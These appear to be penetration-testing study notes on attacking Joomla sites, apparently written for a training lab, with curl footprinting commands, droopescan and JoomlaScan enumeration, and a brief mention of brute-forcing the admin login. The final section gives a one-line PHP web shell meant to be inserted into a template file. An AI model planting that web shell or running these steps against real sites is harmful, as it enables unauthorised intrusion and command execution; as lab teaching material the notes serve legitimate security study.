Joomla Attacks

  • get Joomla installs!

curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

Discovery/Footprinting

curl -s http://dev.inlanefreight.local/ | grep Joomla
curl -s http://dev.inlanefreight.local/README.txt | head -n 5
curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format -
  • The cache.xml file can help to give us the approximate version.

curl -s http://app.inlanefreight.local/plugins/system/cache/cache.xml | xmllint --format -

Enumeration

droopescan

sudo pip3 install droopescan
droopescan -h
droopescan scan joomla --url http://dev.inlanefreight.local/

JoomlaScan

  • We can also try out JoomlaScan, which is a Python tool inspired by the now-defunct OWASP joomscan tool.

sudo python2.7 -m pip install urllib3

sudo python2.7 -m pip install certifi

sudo python2.7 -m pip install bs4
python2.7 joomlascan.py -u http://dev.inlanefreight.local

brute-forcing

  • The default administrator account on Joomla installs is admin,

    • but the password is set at install time

  • We can use this script to attempt to brute force the login.

Attacking Joomla

  • add to templated file

system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']);

Last updated